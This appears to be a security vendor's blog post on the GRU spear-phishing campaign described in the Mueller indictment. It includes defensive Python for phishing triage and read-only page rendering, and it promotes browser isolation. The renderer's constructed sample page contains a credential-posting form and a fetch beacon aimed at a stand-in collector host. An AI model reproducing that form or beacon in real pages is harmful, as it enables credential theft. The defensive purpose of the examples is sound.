Regardless of the political fallout from Special Counsel Robert S. Mueller’s indictment of twelve Russian intelligence officers for interfering in the 2016 U.S. Presidential election, this much seems clear after reading the 29-page, John le Carré-like document: it is no longer reasonable to expect any organization to defend successfully against such a massive, coordinated cyberattack using conventional tools alone.
The document reads like a cybersecurity executive’s worst nightmare. The Russians employed nearly a dozen techniques to steal, and then anonymously distribute, hundreds of thousands of emails and other documents taken from the Clinton Campaign and Democratic Party organizations. Some of the defendants also conspired to hack into the computers of state boards of elections, secretaries of state, and companies that supplied software and other technology related to the administration of the 2016 U.S. Presidential election.
The sophistication of these efforts is breathtaking. To pull off phase one of the attack, stealing the documents in the first place, the conspirators ran a large spear-phishing campaign: customized emails, built with social engineering, designed to trick specific individuals into handing over their credentials or unknowingly downloading malware onto their devices. Starting in March 2016, the conspirators targeted more than 300 people associated with the Clinton Campaign, the Democratic National Committee (DNC), and the Democratic Congressional Campaign Committee (DCCC). The emails were made to look like legitimate security notifications from Google, asking the recipient to click a link and change their Gmail password for their own protection. Leaving little to chance, the conspirators passed the link through a URL shortener, so the address of the fake password-reset page would not give the game away. This is how the GRU, Russia’s military intelligence agency, stole over 50,000 emails from the chairman of the Clinton Campaign, John Podesta. He was hardly alone: according to the indictment, hundreds of others were similarly victimized.
Once a victim had entered their credentials, the GRU units could read and monitor every email in that inbox and send mail that appeared to come from the target’s account. These spear-phishing attacks continued through the summer and autumn of 2016, right up to the election. In July of that year, according to the indictment, the conspirators for the first time spear-phished accounts at a third-party provider used by Hillary Clinton’s personal office.
The Russians were after more than credentials. After a DCCC employee fell for a spear-phishing email in April 2016, the GRU installed multiple versions of a malware program called X-Agent, which let it monitor DCCC employees’ devices, log their activity down to individual keystrokes, steal their passwords, and maintain access to the DCCC network as a whole.
The conspirators used other, more elaborate methods as well. In one case they created a phony email account bearing the name of a Clinton Campaign official with a single letter changed. More than 30 Clinton staffers received emails from this “spoofed” account. Each email carried an embedded link that purported to open a document named “hillary-clinton-favorable-rating.xlsx”; anyone who missed the misspelling and clicked it was sent instead to a GRU-created website that likely pushed malware onto their PC or other device.
The conspirators were no slouches at putting stolen credentials to work. In June 2016 they registered the domain actblues.com, a look-alike of the legitimate political fundraising site actblue.com, and used stolen DCCC credentials to modify the DCCC website so that visitors were silently redirected to the bogus domain. The indictment does not say whether, or how much, money was diverted this way. When it came time to distribute the stolen documents without implicating Russia, they set up domains such as dcleaks.com and used spoofed and phony email addresses to leak the material in stages to organizations believed to include WikiLeaks.
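The patterns described above (a Google-branded password lure hidden behind a URL shortener, a mailbox name one letter off a real colleague’s, and a fundraising domain one letter off the real one) are all checkable mechanically before anyone clicks. The following triage script is an added example written for this post; it is not code from the indictment, the campaign organizations or Menlo Security. The allow-lists, the placeholder domains campaign.example and freemail.example, the shortener list and the four sample messages are all constructed for illustration (actblue.com and actblues.com are the domains the post names).

```python
"""Triage of the spear-phishing patterns described in the post.

Added example, not code from the indictment or from Menlo Security.
Allow-lists and sample messages below are constructed for illustration."""
import re
from urllib.parse import urlparse

# Hypothetical allow-lists an organization would maintain.
TRUSTED_SENDERS = {"alex.doe@campaign.example"}
TRUSTED_LOCAL_PARTS = {s.split("@")[0] for s in TRUSTED_SENDERS}
TRUSTED_DOMAINS = {"campaign.example", "actblue.com", "accounts.google.com"}
# Public URL-shortening services (generic list, not taken from the indictment).
SHORTENERS = {"bit.ly", "tinyurl.com", "goo.gl", "t.co", "ow.ly"}
URL_RE = re.compile(r"https?://[^\s<>\"']+")
LURE_RE = re.compile(r"password|sign-?in|verify your account", re.I)


def edit_distance(a, b):
    """Levenshtein distance (insert/delete/substitute); inputs are short."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def closest(candidate, trusted, max_distance=1):
    """Return the trusted string within max_distance edits of candidate, or None.
    Distance 1 catches the one-letter-off mailbox name and actblues.com."""
    best = None
    for t in trusted:
        d = edit_distance(candidate, t)
        if d <= max_distance and (best is None or d < best[0]):
            best = (d, t)
    return best[1] if best else None


def triage(msg):
    """Return [(indicator, detail), ...] for a dict with from/subject/body keys.
    The From header is trivially spoofable, so the link checks do not rely on it."""
    findings = []
    local, _, domain = msg["from"].lower().rpartition("@")
    if domain not in TRUSTED_DOMAINS:
        hit = closest(domain, TRUSTED_DOMAINS)
        if hit:
            findings.append(("lookalike-sender-domain", f"{domain} imitates {hit}"))
        hit = closest(local, TRUSTED_LOCAL_PARTS)
        if hit:
            findings.append(("lookalike-sender", f"{local}@{domain} imitates {hit}"))
    text = msg["subject"] + "\n" + msg["body"]
    reset_lure = LURE_RE.search(text) is not None
    for url in URL_RE.findall(text):
        host = (urlparse(url).hostname or "").lower()
        if host in SHORTENERS:
            findings.append(("shortened-url", url))
        if host not in TRUSTED_DOMAINS:
            if reset_lure:
                findings.append(("reset-lure-offsite", url))
            hit = closest(host, TRUSTED_DOMAINS)
            if hit:
                findings.append(("lookalike-link", f"{url} imitates {hit}"))
    return findings


# Constructed sample messages modelled on the four patterns in the post.
SAMPLE_MESSAGES = [
    {"from": "alex.doe@campaign.example", "subject": "Tomorrow's schedule",
     "body": "Agenda is at https://campaign.example/docs/agenda"},
    {"from": "no-reply@accounts.google.com",   # spoofed header, trusted domain
     "subject": "Someone has your password",
     "body": "Change your password immediately: https://bit.ly/2xR3abc"},
    {"from": "alex.dee@freemail.example",      # one letter off a real colleague
     "subject": "hillary-clinton-favorable-rating.xlsx",
     "body": "Latest numbers: http://files.freemail.example/hillary-clinton-favorable-rating.xlsx"},
    {"from": "donate@actblues.com", "subject": "Contribute today",
     "body": "Give here: https://actblues.com/donate"},
]

if __name__ == "__main__":
    for m in SAMPLE_MESSAGES:
        print(m["from"], "->", triage(m) or "clean")
```

The spoofed Google notice passes the sender checks entirely, which is the point: only the link analysis (shortener plus an off-site destination for a password lure) catches it. A mail gateway would feed real headers and expand shortened URLs before applying the same rules.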
And, oh, by the way, the Russians paid for most of this infrastructure with cryptocurrency, principally bitcoin, some of which the indictment says they mined themselves. Whether any of it was obtained by malicious means, such as cryptojacking, the indictment does not say.
So what’s the lesson? While not impossible, cobbling together every traditional cybersecurity tool needed to counter such a many-headed attack is a formula for failure. Realistically, there is very little chance the target of such an assault could have identified every last phishing email and spotted every piece of carefully concealed malware.
One defense that attacks the common thread running through nearly every technique above, a user following a link or opening a document, is a technology called browser isolation. This approach, sometimes called remote browsing, can stop phishing and spear-phishing attacks, defang weaponized documents, and keep malicious software from ever reaching its intended target in the first place. Isolation inserts a remote, isolated execution environment (the isolation platform) between the user and potential sources of attack or infection. Web sessions execute away from the user’s device, and only safe rendering information is delivered to it. Isolation is not a complete answer to the indictment on its own: credentials already in an attacker’s hands, and intrusions that never pass through a browser, still call for controls such as phishing-resistant multifactor authentication and network monitoring.
If isolation technology such as our Menlo Security Isolation Platform (MSIP) had been in place, the spear-phishing links masked by URL shorteners would have been rewritten, and every phishing page would have been loaded inside our cloud-based platform, far from the user’s device. Had those pages carried malware, it would have had no path to a campaign aide’s device. Any weaponized document downloaded would likewise have been intercepted by MSIP: the user could view it rendered as HTML5 or download a safe PDF version. If the original were required, administrator policy might have allowed the download, but only after extensive scanning and sandboxing. That means no keylogging, no screenshot capture and no monitoring by the attackers, which in turn means no credential theft and no follow-on attacks that are costlier still.
Isolation also blunts credential phishing and other email-borne attacks. With our Isolation Platform configured to render suspect web pages in “read only” mode, an unsuspecting volunteer or campaign chairman could not type credentials into a bogus password-reset page even after being tricked into opening it by a cleverly written spear-phishing email; the page would display, but its forms would accept no input.
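To make the two controls just described concrete, here is a toy illustration added for this post. It is not Menlo Security’s code and says nothing about how MSIP is actually implemented; the gateway address isolate.example is hypothetical and the sample page is a constructed stand-in for a look-alike password-reset page. It rewrites links so the next fetch also goes through the gateway, and re-emits a fetched page with scripts and inline event handlers dropped, the form’s submission target removed and every input disabled, so a credential typed into the page has nowhere to go.

```python
"""Toy read-only rendering and link rewriting, in the spirit of browser isolation.

Added example for this post; not Menlo Security code and not MSIP's design.
ISOLATION_GATEWAY is a hypothetical address; SAMPLE_PAGE is constructed."""
import html
from html.parser import HTMLParser
from urllib.parse import quote, urlparse

ISOLATION_GATEWAY = "https://isolate.example/fetch?u="   # hypothetical
CONTROLS = {"input", "textarea", "select", "button"}


def rewrite_link(url):
    """Send http(s) links through the gateway; neuter executable schemes."""
    scheme = urlparse(url).scheme.lower()
    if scheme in ("http", "https"):
        return ISOLATION_GATEWAY + quote(url, safe="")
    if scheme in ("javascript", "data", "vbscript"):
        return "#"                      # a link must never execute code
    return url   # mailto:, relative paths; a real gateway resolves relatives


class ReadOnlyRenderer(HTMLParser):
    """Re-emit HTML with scripts dropped and every interaction neutralized."""

    def __init__(self):
        super().__init__()
        self.out = []
        self.in_script = 0
        self.stats = {"dropped_scripts": 0, "disabled_controls": 0, "rewritten_links": 0}

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script += 1
            self.stats["dropped_scripts"] += 1
            return
        if self.in_script:
            return
        kept = []
        for name, value in attrs:
            if name.startswith("on"):                   # inline event handlers
                continue
            if tag == "form" and name in ("action", "method"):
                continue                                # nowhere to submit to
            if tag == "a" and name == "href" and value:
                value = rewrite_link(value)
                self.stats["rewritten_links"] += 1
            kept.append((name, value))
        if tag in CONTROLS:
            kept = [(n, v) for n, v in kept if n != "disabled"] + [("disabled", None)]
            self.stats["disabled_controls"] += 1
        self.out.append(self._fmt(tag, kept))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)                # void tag: no end tag

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script -= 1
            return
        if not self.in_script:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.in_script:
            self.out.append(html.escape(data, quote=False))

    @staticmethod
    def _fmt(tag, attrs):
        parts = [tag]
        for name, value in attrs:
            parts.append(name if value is None else f'{name}="{html.escape(value, quote=True)}"')
        return "<" + " ".join(parts) + ">"


def render_read_only(page_html):
    """Return (safe_html, stats) for a page fetched on the user's behalf."""
    r = ReadOnlyRenderer()
    r.feed(page_html)
    r.close()
    return "".join(r.out), r.stats


# Constructed stand-in for a look-alike password-reset page.
SAMPLE_PAGE = """<html><body>
<h1>Someone has your password</h1>
<form action="https://collector.example/steal" method="post">
Email: <input type="text" name="email">
Password: <input type="password" name="pw" onfocus="beacon()">
<button type="submit">Change password</button>
</form>
<a href="https://accounts.google.com/">Not you?</a>
<script>fetch("https://collector.example/beacon");</script>
</body></html>"""

if __name__ == "__main__":
    safe, stats = render_read_only(SAMPLE_PAGE)
    print(safe)
    print(stats)
```

Rendering to HTML this way is only a sketch of the policy: strip execution, break submission, keep the user inside the gateway. A production isolation platform goes further by executing the page in a remote browser and streaming a rendering, which is what also keeps exploits against the browser itself off the endpoint.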
Of course, hindsight is 20/20. But an isolation platform like ours could, in principle, have prevented the successful attacks on the Clinton Campaign, the DNC and the DCCC, and on our democracy. At worst, it would have made those attacks much harder to pull off. Why not consider an approach that raises the likelihood of a successful defense and shifts the lousy odds onto the attackers?
For more information on Menlo Security’s Isolation Platform and spear-phishing, please download our report, “Anatomy of a Spear Phishing Attack.”
For more information on how cybercriminals deliver malware today, please download our report, “Microsoft Office – The New Platform for Exploiting Zero-Days.”
For more information on how cybercriminals are exploiting traditional measures of trust on the web, please download our “State of the Web 2017” report.